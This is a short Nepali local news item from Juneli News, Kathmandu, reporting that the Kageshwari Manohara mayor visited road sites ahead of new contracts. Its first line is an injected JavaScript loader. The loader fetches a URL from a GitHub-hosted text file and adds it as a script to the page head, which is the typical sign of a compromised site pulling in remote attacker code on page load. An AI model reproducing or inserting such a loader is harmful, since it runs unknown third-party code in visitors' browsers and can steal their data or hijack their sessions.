;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ |
कगेश्वरी मनोरहा नगरपालिका मेयर उपेन्द्र कार्की नयाँ ठेक्का लाग्ने विभिन्न सडकको सिघ्र कार्य अघाडी बढाउन फिल्ड भिजिट गरेका छन् |
वडा नं ८ नौलो बस्ति परिसरमा बिरभद्र क्लब चिप्लेगौँडा सडक, तेजबिनायक प्रतिष्ठान हुदै बागमति कोरिडोर वडा न ९ अन्तरगत माहानटार रइडर सडक, खहरे संमरक्षण एवम ब्यवस्थापन गरी नँया ठेक्काको अन्तिम तयारिमा रहेकाले आज नगरपालिकाको मेयर उपेम्द्र कार्की फिल्ड भिजिटमा हिडेका छन् |
उनि संगै नगरपालिकाका प्राबिधिक, जनप्रतिनिधि र स्थानिय सहितको टोलीले सडकको अनुगमन गरि चाडो कार्य अगाडी बढाउने कुरामा अघि बढेका छन् |
फेसबुक प्रतिक्रियाहरु